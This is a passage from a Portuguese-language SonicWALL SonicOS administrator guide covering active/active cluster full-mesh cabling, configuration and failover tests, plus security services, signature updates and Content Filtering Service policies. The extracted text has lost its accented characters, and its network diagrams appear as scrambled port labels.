comea a ser usada para compartilhamento de carga. O trfego do Grupo virtual 1 enviado
em X3, enquanto o trfego do Grupo virtual 2 enviado em X4. Em uma implantao maior, se
o N 1 do cluster detiver trs ou quatro Grupos virtuais, o trfego distribudo entre as portas
redundantes o trfego para os Grupos virtuais 1 e 3 enviado em X3, enquanto o trfego
para os Grupos virtuais 2 e 4 enviado em X4.
Quando um switch redundante configurado, a SonicWALL recomenda usar uma porta
redundante para se conectar a ela. Embora seja possvel conectar um switch redundante sem
usar uma porta redundante, isso envolve uma configurao complexa usando investigaes.
Um switch redundante pode ser implantado em qualquer lugar na rede de acordo com a
necessidade de alta disponibilidade. Por exemplo, um switch redundante pode ser implantado
no lado da WAN se o trfego que passa por ele for essencial para o negcio.

Este diagrama mostra uma implantao que inclui roteadores, switches e portas redundantes
no lado da WAN, mas no uma implantao de malha completa porque o lado da LAN no
usa redundncia.
Figura 26 Redundncia do lado da WAN
Router A Virtual Router Router B
Switch B Switch C
X1 X2 X2 X1
links to both units links to both units
10GE 1GE 1GE 10GE 1GE 1GE 10GE 1GE 1GE 10GE 1GE 1GE
X18 X16 X14 X12 X10 X8 X6 X4 X2 X0 X18 X16 X14 X12 X10 X8 X6 X4 X2 X0 X18 X16 X14 X12 X10 X8 X6 X4 X2 X0 X18 X16 X14 X12 X10 X8 X6 X4 X2 X0
SDHC SDHC SDHC SDHC
M0 M0 M0 M0
ALARM
BYPASS ALARM
BYPASS ALARM
BYPASS ALARM
BYPASS
STATUS STATUS STATUS STATUS
TEST TEST TEST TEST

PWR 1 PWR 2
PWR 1 PWR 2
PWR 1 PWR 2
PWR 1 PWR 2
MGMT X19 X17 X15 X13 X11 X9 X7 X5 X3 X1
Primary Backup Primary Backup

X6 X6 X6 X6
Active/Active DPI HA Data Interfaces Active/Active DPI HA Data Interfaces
Cluster Node 1 links to both units links to both units Cluster Node 2
X0 HA HA X0
Switch D
Primary Link
Redundant Link
Xn, HA Interfaces
Switch A
No necessria malha completa ao implantar portas ou switches redundantes, mas estes

esto includos em uma implantao de malha completa. Uma implantao de malha completa
usa portas redundantes em cada uma das portas de trfego principal (LAN, WAN, etc.) e usa
roteadores upstream redundantes, alm de switches redundantes.
Para obter mais informaes sobre implantaes de malha completa, consulte Active/Active
Clustering Full Mesh Deployment Technote (Nota tcnica de implantao de malha completa
de clustering ativo/ativo).
Configurar a malha completa de clustering ativo/ativo

Esta seo descreve o procedimento para a configurao de uma implantao de malha
completa de cluster ativo/ativo. Ela descreve uma configurao de malha completa de
clustering ativo/ativo de 4 unidades. Iremos abordar os seguintes aspectos da implantao:
Cabeamento para malha completa ativa/ativa na pgina 1152
Configurar firewalls de cluster ativo/ativo na pgina 1153
Configurar a implantao de 2 unidades de malha completa de cluster ativo/ativo na
pgina 1154

As implantaes descritas so exemplos. A sua implantao pode ser diferente com base nos
seguintes fatores:
Topologia/design da sua rede e dos tipos de dispositivos de rede que voc usa (switches,
roteadores, balanceadores de carga, etc.)
Nvel de disponibilidade desejada
Restries de recursos
Figura 27 Malha completa de cluster de quatro unidades ativo/ativo
Router A Virtual Router Router B
Switch C Switch D
X1 X3 X3 X1
redundant interface redundant interface
Cluster Node 1 Links to Both Units Links to Both Units Cluster Node 2
Primary Primary
Cluster Link 1
10GE 1GE 1GE
Xn Xn 10GE 1GE 1GE
SDHC SDHC
M0 M0
ALARM
BYPASS ALARM
BYPASS
STATUS STATUS
TEST TEST

X19 X17 X15 X13 X11 X9 X7 X5 X3 X1 SonicWALL SuperMassive 9200 PWR 1 PWR 2
X19 X17 X15 X13 X11 X9 X7 X5 X3 X1
Xn Xn
CONSOLE MGMT CONSOLE MGMT
Co
HA Data A/A DPI HA Control nt HA Data A/A DPI HA Control
ro
X3
Interface Interface X3
Interface l Lin X3
Interface Interface X3
Interface
k1
Xn Xn Xn Xn Xn Xn
2
ink
lL
ro
nt
Xn Xn Xn Co Xn Xn Xn
Xn Xn
X18
10GE
X16 X14 X12
1GE
X10 X8 X6 X4
1GE
X2 X0 Cluster Link 2 X18
10GE
X16 X14 X12
1GE
X10 X8 X6 X4
1GE
X2 X0
SDHC
M0
ALARM
TEST
BYPASS
STATUS
Xn Xn SDHC
M0
ALARM
TEST
BYPASS
STATUS

PWR 1 PWR 2
PWR 1 PWR 2
MGMT X19 X17 X15 X13 X11 X9 X7 X5 X3 X1
Secondary Secondary
Links to Both Units Links to Both Units

X0 X2 X2 X0
redundant interface redundant interface
Router
Xn Interface
Primary Link
Switch A Switch B Redundant Link

Switch

Cabeamento para malha completa ativa/ativa
Este procedimento descreve o cabeamento para a implantao ilustrada no diagrama acima.
Para conectar fisicamente seus dispositivos de rede para uma implantao de malha completa,
Etapa 1 Conecte todos os links de AD de todos os firewalls em uma VLAN baseada em porta no switch
E.
Etapa 2 Na configurao descrita acima, X2 a porta redundante de X0. Conecte os cabos da seguinte
forma s portas X0 e X2:
a. Conecte X0 ao switch A e X2 ao switch B do firewall primrio CN2.
b. Conecte X0 ao switch A e X2 ao switch B do firewall de backup CN2.
c. Conecte X0 ao switch B e X2 ao switch A do firewall primrio CN2.
d. Conecte X0 ao switch B e X2 ao switch A do firewall de backup CN2.
Etapa 3 No switch A e switch B:
a. Configure todas as portas do switch conectadas s interfaces X0, X2 para que estejam na
mesma VLAN baseada em portas.
b. Habilite a rvore de extenso, mas tambm habilite a porta Fast (ou o comando
equivalente) nas portas conectadas aos firewalls.
Etapa 4 Na configurao descrita acima, X3 a porta redundante de X1. Conecte os cabos da seguinte
forma s portas X1 e X3:
a. Conecte X1 ao switch C e X3 ao switch D do firewall primrio CN2.
b. Conecte X1 ao switch C e X3 ao switch D do firewall de backup CN2.
c. Conecte X1 ao switch D e X3 ao switch C do firewall primrio CN2.
d. Conecte X1 ao switch D e X3 ao switch C do firewall de backup CN2.
Etapa 5 No switch C e switch D:
a. Configure todas as portas do switch conectadas s interfaces X1, X3 para que estejam na
mesma VLAN baseada em portas.
b. Habilite a rvore de extenso, mas tambm habilite a porta Fast (ou o comando
equivalente) nas portas conectadas aos firewalls.
Etapa 6 Conecte os cabos do switch A e do switch B em conjunto.
Etapa 7 Conecte os cabos do switch C e do switch D em conjunto.
Etapa 8 Se o roteador A e o roteador B suportarem portas redundantes, conecte os roteadores aos
switches da mesma forma como foram conectadas as portas do firewall aos switches. Por
outras palavras, conecte a porta primria no roteador A ao switch C e a porta de backup no
roteador A ao switch D. Conecte as portas da mesma forma para o roteador B.
Etapa 9 Se os roteadores no suportarem portas redundantes, mas suportarem comutao, crie ento
duas portas na mesma VLAN no roteador A e atribua um endereo IP VLAN em vez da porta.
Conecte uma porta ao switch C e a outra porta ao switch D. Realize uma configurao
semelhante para o roteador B. (Esta a configurao mostrada no diagrama.)
Etapa 10 Na configurao descrita acima, tambm usamos a DPI ativa/ativa com Clustering ativo/ativo.
As portas X6 e X7 so as duas portas de dados de AD para redundncia e compartilhamento
de carga de trfego descarregado de firewalls Ativos para firewalls Em espera. Execute o
seguinte cabeamento (as portas X6, X7 e o cabeamento no foram mostrados no diagrama
acima para brevidade):

a. Conecte X6 de Primrio CN1 a X6 de Backup CN1 com um cabo transversal.
b. Conecte X7 de Primrio CN1 a X7 de Backup CN1 com um cabo transversal.
c. Conecte X6 de Primrio CN2 a X6 de Backup CN2 com um cabo transversal.
d. Conecte X7 de Primrio CN2 a X7 de Backup CN2 com um cabo transversal.
Configurar firewalls de cluster ativo/ativo

Esta seo descreve as etapas para configurar os firewalls de cluster ativo/ativo.
Etapa 1 Encerre todos os firewalls, exceto a unidade primria CN1.

Etapa 2 Na pgina Alta disponibilidade > Configuraes:
a. Escolha o modo de Clustering ativo/ativo.
b. Digite os nmeros de srie do n de cluster.
c. Selecione CN1 como Proprietrio para o Grupo virtual 1 e Em espera para o Grupo virtual
2.
d. Selecione CN2 como Proprietrio para o Grupo virtual 2 e Em espera para o Grupo virtual
1.
e. Habilite a sincronizao estvel.
f. Habilite a DPI ativa/ativa com X6 e X7 como as duas portas de dados de AD.
g. Clique em Enviar.
Etapa 3 Na pgina Rede > Interfaces:
a. Adicione os endereos IP do Grupo virtual (VG) para as interfaces X0 e X1.
b. Adicione a configurao da porta redundante (X2 como porta redundante de X0, X3 como
porta redundante de X1).
Etapa 4 Na pgina Alta disponibilidade > Monitoramento, adicione os endereos IP de
monitoramento/gerenciamento em X0 ou X1 para cada unidade no cluster.
Etapa 5 Ative todos os outros firewalls. realizada uma sincronizao completa da configurao a
partir de primrio CN1 para todos os outros firewalls.
Etapa 6 Faa logon em cada unidade de firewall usando o endereo de monitoramento/gerenciamento
dedicado e realize o seguinte:
a. Registre o firewall em MySonicWALL.
b. Sincronize as licenas com o MySonicWALL.
Teste de nenhum ponto de falha

Aps a implantao acima estar conectada e configurada, CN1 ter a propriedade do Grupo
virtual 1 (VG1) e CN2 ter a propriedade do Grupo virtual 2 (VG2).
Configure o endereo IP de VG1 em X0 como o gateway para um determinado conjunto de
fluxos de trfego e o endereo IP de VG2 em X0 como o gateway para outros conjuntos de
fluxos de trfego. O administrador de rede pode usar mtodos diferentes para realizar essa
tarefa. Uma das formas implica usar um servidor DHCP inteligente que distribui a alocao de
gateway para os PCs na rede do cliente diretamente conectada. Outro mtodo implica usar
rotas baseadas em poltica em um roteador downstream.

Quando realizada a configurao do trfego, os dois ns de cluster processaro ativamente
o trfego de rede. Agora podemos testar se no existe nenhum ponto de falha em todos os
dispositivos e links atravs das seguintes etapas:
Etapa 1 Falhas de dispositivo: O trfego dever continuar a fluir atravs dos dois ns de cluster em
cada uma das seguintes falhas de dispositivo:
a. Desligue o Switch A enquanto o Switch B estiver ativo e pronto.
b. Desligue o Switch B enquanto o Switch A estiver ativo e pronto.
c. Reinicie a unidade Ativa no CN1 da interface de gerenciamento do SonicOS enquanto a
unidade Em espera em CN1 estiver ativa e pronta (esse cenrio semelhante a uma falha
de software na unidade ativa CN1). Observe que ocorrer um failover de AD estvel nesse
caso.
d. Encerre a unidade ativa CN1 enquanto a unidade em espera CN1 estiver ativa e pronta
(esse cenrio semelhante a uma falha de hardware na unidade ativa CN1). Observe que
ocorrer um failover de AD estvel nesse caso.
e. Repita as etapas c) e d) para CN2.
f. Desligue o Roteador A enquanto o Roteador B estiver ativo e pronto.
g. Desligue o Roteador B enquanto o Roteador A estiver ativo e pronto.
Etapa 2 Falhas de link: O trfego dever continuar a fluir em cada uma das falhas de link seguintes:
a. Em cada um dos firewalls ativos no n de cluster, desconecte o cabo X0 enquanto X2
estiver conectado.
b. Em cada um dos firewalls ativos no n de cluster, desconecte o cabo X1 enquanto X3
estiver conectado.
c. Desconecte o link primrio dos switches upstream para o roteador que o roteador virtual
ativo.
d. Desconecte X6, a interface de dados AD de DPI ativa-ativa.
Configurar a implantao de 2 unidades de malha completa de cluster ativo/ativo

Nas sees anteriores abordamos o tema de malha completa de cluster ativo/ativo com 4
unidades de firewall. Opcionalmente, voc pode implantar a malha completa de cluster ativo/
ativo com 2 unidades de firewall, em que cada CN consiste somente em um firewall (nenhum
backup de AD). No entanto, essa configurao tem as seguintes limitaes:
O failover no ser estvel e as conexes existentes precisaro ser criadas novamente.
Se o trfego em cada unidade for superior a 50% da capacidade da unidade nica no
momento do failover, o trfego com mais de 50% ser descartado aps o failover.
O procedimento para a malha completa de 2 unidades semelhante ao procedimento para a
malha completa de 4 unidades, com as seguintes excees:
No se aplicam as etapas que envolvem a unidade de Backup em cada n.
No se aplicam as etapas para configurar a Sincronizar estvel e a DPI ativa-ativa.
No necessrio nenhum Switch para conectar as portas de AD (como existem apenas
dois, eles podem ser diretamente conectados com um cabo transversal).

Parte 18
Servios de segurana
| 1155
Captulo 62
Gerenciando Servios de segurana do
SonicWALL
Servios de segurana do SonicWALL

A SonicWALL, Inc. oferece uma variedade de servios de segurana com base em assinatura
para fornecer segurana em camadas para a sua rede. Os Servios de segurana do
SonicWALL so projetados para integrar perfeitamente a sua rede para oferecer proteo total.
Os seguintes servios de segurana com base em assinatura so listados em Servios de
segurana, na interface de gerenciamento do firewall:
SonicWALL Content Filtering Service
SonicWALL Client Anti-Virus
SonicWALL Gateway Anti-Virus.
SonicWALL Intrusion Prevention Service
SonicWALL Anti-Spyware
Filtro RBL
Dica Aps registrar seu firewall, voc pode experimentar verses de AVALIAO GRATUITA do
SonicWALL Content Filtering Service, SonicWALL Client Anti-Virus, SonicWALL Gateway
Anti-Virus, SonicWALL Intrusion Prevention Service e SonicWALL Anti-Spyware.
Voc pode ativar e gerenciar os servios de segurana diretamente da interface de

gerenciamento SonicWALL ou de https://www.mysonicwall.com.
Gerenciando Servios de segurana do SonicWALL | 1157

Resumo dos servios de segurana
A pgina Servios de segurana > Resumo lista os servios de segurana SonicWALL
disponveis e atualizaes para o seu firewall e fornece acesso ao mysonicwall.com para ativar
os servios usando as Chaves de ativao.
exibida uma lista de servios disponveis no momento na tabela Resumo dos servios de
segurana. Os Servios Assinados so exibidos com Licenciado na coluna Status. A data de
expirao do servio exibida na coluna Expirao. Se o servio est limitado a um nmero
de usurios, o nmero exibido na coluna Contagem. Se o servio no est licenciado, No
licenciado exibido na coluna Status. Se a licena de servio tiver expirado, Expirado
exibido na coluna Status.
Quando voc acessa sua conta mysonicwall.com nessa pgina na interface de gerenciamento
SonicWALL, a tabela Resumo dos servios de segurana muda para a tabela Gerenciar
Servios Online. Esta tabela fornece um status atualizado dos servios de segurana e
permite que voc ative uma verso de AVALIAO GRATUITA e ativar ou renovar licenas de
servios de segurana usando as Chaves de ativao.
Se o seu firewall no est registrado, a pgina Servios de segurana > Resumo no inclui
a tabela Resumo de Servios. O firewall deve ser registrado para exibir a tabela Resumo de
Servios.
mysonicwall.com
Para ativar os Servios de segurana do SonicWALL, voc deve ter uma conta
mysonicwall.com e seu firewall deve ser registrado. Criar uma conta no mysonicwall.com
rpido, fcil e grtis. Voc pode criar uma conta do mysonicwall.com diretamente na interface
de gerenciamento SonicWALL. Simplesmente preencha um formulrio de registro on-line.
Quando a conta criada, voc pode registrar firewalls e ativar os Servios de segurana
SonicWALL associados ao firewall.

O mysonicwall.com fornece um recurso conveniente e nico para registro, ativao e
gerenciamento dos seus produtos e servios SonicWALL. Sua conta mysonicwall.com fornece
um nico perfil para fazer o seguinte:
Registrar seu dispositivo de segurana de rede Dell SonicWALL
Experimentar verses de avaliao dos servios de segurana do SonicWALL
Comprar/Ativar licenas de servios de segurana do SonicWALL
Receber alertas e atualizaes de servio de firmware e segurana SonicWALL
Gerenciar seus servios de segurana do SonicWALL
Acessar o suporte tcnico da Dell SonicWALL
Tambm possvel acessar a sua conta mysonicwall.com atravs de qualquer conexo com a
Internet com um navegador Web que use o protocolo HTTPS (Hypertext Transfer Protocol
Secure) para proteger suas informaes sensveis. Voc tambm pode acessar servios de
licena e registro de mysonicwall.com diretamente da interface de gerenciamento do
SonicWALL para maior facilidade de uso e ativao de servios simplificado.
Gerenciando servios de segurana online

Clicar no boto Gerenciar Licenas exibe a pgina de Login mysonicwall.com para acessar
suas informaes de licenciamento da conta MySonicWALL.com.
Digite seu nome de usurio e senha no mySonicWALL.com nos campos Nome de usurio e
Senha e clique em Enviar. A pgina Sistema > Licenas exibida com a tabela Gerenciar
servios on-line.

A informao na tabela Gerenciar servios on-line atualizada da sua conta
mysonicwall.com.
Se voc j estiver conectado conta do mysonicwall.com na interface de gerenciamento, a

tabela Gerenciar servios on-line exibida.
Clique em Sincronizar para atualizar as informaes de licena e assinatura no firewall a partir
da sua conta mysonicwall.com.
Configurando Servios de segurana

As sees a seguir descrevem as configuraes globais que so executadas na pgina
Servios de segurana > Resumo:
Configuraes de servios de segurana na pgina 1160
Downloads de assinaturas e registro por meio de um servidor proxy na pgina 1161
Informaes de servios de segurana na pgina 1162
Atualizar assinatura manualmente na pgina 1162
Configuraes de servios de segurana
A seo de Configuraes de servios de segurana fornece as seguintes opes para ajustar

os servios de segurana SonicWALL:

Configuraes de servios de segurana - Esse menu suspenso especifica se os
servios de segurana SonicWALL so aplicados para maximizar a segurana ou para
maximizar o desempenho:
Segurana mxima (recomendado) - Inspeciona todo o contedo com qualquer
probabilidade de ameaa (alta/mdia/baixa). Para uma capacidade de desempenho
adicional nesta configurao de segurana mxima, use o Clustering de UTM do
SonicOS.
Desempenho otimizado - Inspeciona todo o contedo com alta ou mdia
probabilidade de ameaa. Considere esta configurao de segurana de desempenho
otimizado para implantaes de gateway intensivas em CPU ou largura de banda ou
use o Clustering de UTM do SonicOS.
A configurao de Segurana mxima fornece proteo mxima. A configurao de
Desempenho otimizado utiliza conhecimento das ameaas atualmente conhecidas para
fornecer alta proteo contra ameaas ativas no cenrio das ameaas.
Reduzir trfego de antivrus para conexes ISDN - Selecione esse recurso para permitir
ao antivrus do SonicWALL verificar diariamente (a cada 24 horas) a existncia de
atualizaes e reduzir a frequncia de trfego de sada para usurios que no possuem
conexo Internet sempre ativa.
Descartar todos os pacotes enquanto o IPS, GAV e banco de dados Anti-Spyware
est sendo recarregado - Selecione essa opo para instruir o firewall para deixar todos
os pacotes sempre que o banco de dados de IPS, GAV e antivrus estiverem atualizando.
Tempo limite de notificao sem cliente HTTP para Gateway Anti-Virus e anti-
spyware - Define a durao do tempo limite aps o qual o firewall notifica os usurios
quando o GAV ou o Anti-Spyware detecta uma ameaa recebida de um servidor HTTP. O
tempo limite padro um dia (86400 segundos).
Downloads de assinaturas e registro por meio de um servidor proxy

Esta seo fornece a capacidade dos dispositivos de segurana de rede Dell SonicWALL que
operam em redes em que devem acessar a Internet por meio de um servidor proxy para baixar
assinaturas. Esse recurso tambm permite o registro de dispositivos de segurana de rede Dell
SonicWALL atravs de um servidor proxy sem comprometer a privacidade. Para ativar o
download de assinaturas e registro por meio de um servidor proxy, efetue as seguintes etapas:
1. Selecione a caixa de seleo Baixar assinaturas por meio de um servidor proxy.
2. No campo Nome de servidor proxy ou endereo IP, insira o nome do host ou endereo
IP do servidor proxy.
3. No campo Porta do servidor proxy, insira o nmero da porta usada para conectar ao
servidor proxy.
4. Selecione a caixa de seleo Este servidor proxy requer autenticao se o servidor
proxy requer um nome de usurio e senha.
5. Se o dispositivo no foi registrado em mySonicWALL.com, dois campos adicionais so
exibidos:
Nome de usurio MySonicWALL -Digite o nome de usurio da conta
MySonicWALL.com que o dispositivo deve ser registrado.
Senha do MySonicWALL - Digite a senha da conta MySonicWALL.com.
6. Clique em Aceitar na parte superior da pgina.

Informaes de servios de segurana
Essa seo inclui uma viso geral rpida dos servios disponveis para o dispositivo de
segurana de rede Dell SonicWALL
Atualizar assinatura manualmente

O recurso de Atualizao de assinatura manual destinado a redes em que tal conectividade
de Internet com largura de banda no possvel ou desejvel (por questes de segurana). O
recurso Atualizar de Assinatura Manual fornece um mtodo para atualizar as assinaturas mais
recentes a critrio do administrador da rede. O administrador de rede primeiro faz download
das assinaturas em http://www.mysonicwall.com para um computador separado, unidade USB
ou outra mdia. Em seguida, o administrador de rede carrega as assinaturas para o firewall. O
mesmo arquivo de atualizao de assinatura pode ser usado em todos os dispositivos de
segurana de rede Dell SonicWALL que atendem aos seguintes requisitos:
Dispositivos que esto registrados para a mesma conta mysonicwall.com
Dispositivos que pertencem mesma classe de dispositivos de segurana de rede Dell
SonicWALL.
Para atualizar os arquivos de assinatura manualmente, execute o seguinte procedimento:
Etapa 1 Na pgina Servios de segurana > Resumo, role para o cabealho Atualizar assinaturas
manualmente na parte inferior da pgina. Anote a ID do arquivo de assinatura para o seu
dispositivo.
Etapa 2 Efetue login em http://www.mysonicwall.com usando a conta mysonicwall.com que foi usada
para registrar o dispositivo de segurana de rede Dell SonicWALL.

Nota O arquivo de assinatura s pode ser usado em firewalls que esto registrados na conta
mysonicwall.com que baixou o arquivo de assinatura.
Etapa 3 Clique em Baixar assinaturas sob o ttulo Downloads.

Etapa 4 Na janela suspensa prxima a ID de assinatura, selecione o SFID apropriado para seu
firewall.
Etapa 5 Baixe o arquivo de atualizao de assinatura ao clicar em Clique aqui para baixar o arquivo
de assinatura.
Nota As etapas restantes podem ser realizadas enquanto desconectado da Internet.
Etapa 6 Volte para a pgina Servios de segurana > Resumo na interface de gerenciamento do
firewall.
Etapa 7 Clique na caixa Importar assinaturas.
Etapa 8 Na janela pop-up que aparece, clique no boto Procurar e navegue at o local do arquivo de
atualizao de assinatura.
Etapa 9 Clique em Importar. As assinaturas so carregadas para os servios de segurana que esto
habilitados no firewall.
Ativando servios de segurana

Para ativar um Servio de segurana SonicWALL, consulte o captulo especfico do Servio de
segurana.

Captulo 63
Configurando o Content Filtering Service
Servios de segurana > Filtro de contedo

A pgina Servios de segurana > Filtro de contedo permite que voc defina as
configuraes de Restringir recursos da web e Domnios confiveis, que esto includas no
SonicOS. Voc pode ativar e configurar o SonicWALL Content Filtering Service (SonicWALL
CFS), bem como um produto de Filtragem de contedo de terceiros, na pgina Servios de
segurana > Filtro de Contedo.
Nota O Servio de Filtragem de Contedo (Content Filtering Service) da SonicWALL um servio

de assinatura de atualizao. Voc pode experimentar uma verso de avaliao gratuita do
SonicWALL diretamente da interface de gerenciamento do SonicWALL. Consulte Ativando
uma AVALIAO GRATUITA do SonicWALL CFS na pgina 1176.
Configurando o Content Filtering Service | 1165

Para obter a documentao completa do SonicWALL Content Filtering Service, consulte o Guia
do Administrador do SonicWALL Content Filtering Service, disponvel em
http://www.sonicwall.com/us/Support.html.
Implementao do SonicWALL CFS com Regras de aplicativo na pgina 1166
Exemplos de filtragem de contedo de herana na pgina 1175
Configurando as propriedades de filtro do SonicWALL herdado na pgina 1179
Configurando a filtragem de contedo Websense Enterprise na pgina 1189
Restries
Nota O consentimento do Servio de filtragem de servio (CFS) no suportado no Modo de

cabo.
Implementao do SonicWALL CFS com Regras de aplicativo

A iterao mais recente do recurso do CFS permite que o administrador use o poder do recurso
Regras de aplicativo do SonicWALL para aumentar a criao de uma soluo mais poderosa
e flexvel.
Nota Enquanto o novo mtodo de Regras de aplicativo de gerenciamento de CFS oferece mais
controle e flexibilidade, o administrador ainda pode escolher o mtodo de gerenciamento
de usurio/zona anterior para executar a filtragem de contedo. Informaes sobre como
implementar o recurso CFS usando o mtodo anterior podem ser encontradas no Guia do
Administrador do SonicOS.
Novos recursos para Gerenciamento CFS 3.0 usando Regras de aplicativo

Regras de aplicativo - agora includo como parte do processo de criao de regra do
CFS para implementar controle de polticas de filtro de contedo mais granulares, flexveis
e eficientes, criando poltica de CFS para permitir listas utilizando a estrutura de Regras de
aplicativo.
Objetos do aplicativo - Usurios/grupos, objetos de endereo e zonas podem ser
atribudas por polticas CFS individuais.
Gerenciamento de largura de banda - Especificaes CFS podem ser includas em
polticas de gerenciamento de largura de banda com base em categorias de site CFS. Isso
tambm permite o uso de 'Agregao de largura de banda' ao adicionar um mtodo de
agregao de largura de banda por ao.
Novos recursos aplicveis a todos os Mtodos de Gerenciamento CFS 3.0
Nome comum de Certificado SSL - Filtragem de contedo HTTPS significativamente
aprimorado ao adicionar a capacidade de usar um nome comum de certificado SSL, alm
de endereos IP do servidor.
Novas categorias do CFS - Multimdia, Redes sociais, Malware e Internet Watch
Foundation CAIC agora esto includas na lista de CFS.

Servio de filtragem de contedo de herana
O Content Filtering Service (CFS) refora as polticas de proteo e produtividade para
empresas, escolas e bibliotecas para reduzir os riscos legais e de privacidade, minimizando a
sobrecarga da administrao. O CFS utiliza um banco de dados dinmico de milhes de URLs,
endereos IP e domnios para bloquear contedo da Web censurvel, inadequado ou
improdutivo. No ncleo do CFS est uma arquitetura de classificao inovadora que cruza
referncia de todos os sites da Web contra o banco de dados em instalaes de
posicionamento em todo o mundo. Uma classificao retornada ao firewall e, em seguida,
comparada com a poltica estabelecida pelo administrador de filtragem de contedo. Quase
instantaneamente, a solicitao do site da Web ou permitida por meio de uma pgina da Web
ou gerada pelo firewall informando ao usurio que o site foi bloqueado de acordo com a
poltica.
Com CFS, os administradores de rede tm uma ferramenta flexvel para fornecer uma
abrangente filtragem com base em palavras-chave, hora do dia, designaes de domnio
confiveis e proibidos e tipos de arquivos, como Cookies, Java e ActiveX para privacidade.
O CFS atualiza automaticamente os filtros, tornando a manuteno substancialmente mais
simples e menos demorada.
O CFS tambm pode ser personalizado para adicionar ou remover URLs especficos da lista
de bloqueados e para bloquear palavras-chave especficas. Quando um usurio tenta acessar
um site que est bloqueado pelo firewall, uma mensagem personalizada exibida na tela do
usurio. Firewalls tambm podem ser configurados para tentativas de log de acessar sites no
banco de dados do Content Filtering Service, em uma lista de URL personalizada, e em uma
lista de palavras-chave para monitorar o uso da Internet antes de colocar novas restries de
uso em vigor.
O CFS Premium bloqueia 56 categorias de contedo da Web censurvel, contedos
inadequados ou improdutivos. O CFS Premium fornece aos administradores de rede um maior
controle ao fiscalizar automaticamente e de forma transparente as polticas de uso aceitveis.
Ele fornece aos administradores a flexibilidade de impor polticas de filtragem de contedo
personalizado a grupos usurios na rede. Por exemplo, uma escola pode criar uma poltica
para professores e outra para os alunos.
Nota Para obter a documentao completa do Content Filtering Service, consulte o Guia do
Administrador do Content Filtering Service, disponvel em http://www.sonicwall.com/us/
Support.html
Viso geral de Gerenciamento de Poltica CFS 3.0

Quando uma atribuio de poltica de CFS implementada usando o mtodo de Regras de
aplicativo, ela controlada por polticas de Regras de aplicativo de CFS na pgina Regras de
aplicativo > Polticas em vez de por Usurios e Zonas.
Enquanto o novo mtodo de Regras de aplicativo de gerenciamento de CFS oferece mais
controle e flexibilidade, o administrador ainda pode escolher o mtodo de gerenciamento de
usurio/zona anterior para executar a filtragem de contedo.
Escolhendo o Tipo de Gerenciamento de Poltica de CFS na pgina 1168
Habilitando Regras de aplicativo e CFS na pgina 1168
Mtodos de Gerenciamento de largura de banda na pgina 1168
Polticas e precedncia: Como as polticas so impostas na pgina 1169

Escolhendo o Tipo de Gerenciamento de Poltica de CFS
A opo de qual mtodo de gerenciamento de poltica usar Via usurio e Telas de zona ou
Via regras de aplicativo feita na pgina Servios de segurana > Filtro de Contedo.
Nota Enquanto o novo mtodo de Regras de aplicativo de gerenciamento de CFS oferece mais
controle e flexibilidade, o administrador ainda pode escolher o mtodo de gerenciamento
de usurio/zona anterior para executar a filtragem de contedo.
Habilitando Regras de aplicativo e CFS

Antes que os servios comecem a filtrar contedo, voc deve ativ-los:
Etapa 1 Navegue at a pgina Servios de segurana > Filtro de contedo e clique na interface de
gerenciamento do SonicOS.
Etapa 2 Selecione 'Via regras de aplicativo' na lista suspensa Atribuio de poltica de CFS.
Etapa 3 Clique no boto Aceitar para aplicar a alterao.
Etapa 5 Marque a caixa Habilitar Regras de aplicativo.
Mtodos de Gerenciamento de largura de banda

O recurso de Gerenciamento de largura de banda pode ser implementado de duas maneiras
diferentes:
Mtodo por poltica
O limite de largura de banda especificado em uma regra aplicado individualmente
para cada poltica

Exemplo: duas polticas tem um limite independente de 500kb/s, a largura de banda
total possvel entre essas duas regras 1.000 kb/s
Mtodo por ao agregada
A ao de limite de largura de banda aplicada (compartilhada) em todas as polticas
para a qual ela aplicada
Exemplo: duas polticas compartilham um limite BWM de 500kb/s, limitando a largura
de banda total entre as duas polticas a 500kb/s
500kb/s Policy 1
www
BWM Limit
Per Policy Policy 2
exe
500kb/s Policy 1 www

BWM Limit
Per Action Policy 2 exe
O Mtodo de agregao de largura de banda selecionado na tela de Configuraes de Ao

de Regras de aplicativo quando o tipo de Ao est definido como Gerenciamento de largura
de banda.
Polticas e precedncia: Como as polticas so impostas

Esta seo fornece uma viso geral do mecanismo de imposio de poltica no CFS 3.0 para
ajudar o administrador de poltica a criar um conjunto de regras sem redundncias
desnecessrias ou a imposio de lgica de regra conflitante.
Imposio de poltica em grupos diferentes

O comportamento padro bsico para polticas CFS atribudos a diferentes grupos seguir o
padro de lgica mais especfico/menos restritiva, significando:
regra mais especfica, sempre dada a prioridade mais alta
Exemplo
Uma regra aplicada ao grupo de "Engenharia" (um grupo especfico) tem precedncia sobre
uma regra de aplicao para o grupo Todos" (o grupo menos especfico).
Imposio de poltica dentro do mesmo grupo

O comportamento padro bsico para polticas CFS dentro do mesmo grupo seguir uma
lgica aditiva, significando:
As regras so impostas de forma adicional
Exemplo
A poltica CFS 1 probe pornografia, jogos de azar e redes sociais
A poltica CFS 2 se aplica ao gerenciamento de largura de banda para o contedo de esportes
e adulto a 1 Mbps
O resultado final dessas polticas que o contedo de esportes e adulto so gerenciados pela
largura de banda, mesmo que a primeira poltica implique que isso no permitido.

Exemplos de configurao do CFS 3.0
Esta seo fornece exemplos de configurao usando o recurso de Regras de aplicativo para
criar e gerenciar polticas de CFS:
Bloqueando contedo proibido na pgina 1170
Contedo de gerenciamento de largura de banda na pgina 1171
Aplicando polticas a vrios grupos na pgina 1173
Criao de uma categoria CFS personalizada na pgina 1174
Bloqueando contedo proibido

Para criar uma Poltica de CFS para bloqueio de contedo proibido:
Crie um objeto do aplicativo na pgina 1170
Criar uma poltica de Regras de aplicativos para bloquear contedo proibido na
pgina 1171
Crie um objeto do aplicativo
Crie um objeto do aplicativo contendo contedo proibido:
Etapa 1 Navegue para a pgina Firewall > Objetos de correspondncia na interface de

Etapa 2 Clique no boto Adicionar novo objeto de correspondncia e a janela Adicionar/editar
objeto de correspondncia ser exibida.
Etapa 3 Digite uma descrio em Nome de objeto, como 'Contedo proibido'.
Etapa 4 Selecione 'Lista de categorias do CFS ' da lista suspensa Tipo de objeto de
correspondncia.
Etapa 5 Use as caixas de seleo para selecionar as categorias que deseja adicionar lista de
contedo proibido.
Etapa 6 Clique no boto OK para adicionar o objeto lista de Objetos do aplicativo.

Criar uma poltica de Regras de aplicativos para bloquear contedo proibido
Crie uma poltica de Regras de aplicativo para bloquear o contedo definido no Objeto do
aplicativo:
Etapa 1 Navegue para a pgina Firewall > Regras de aplicativo na interface de gerenciamento do
SonicOS.
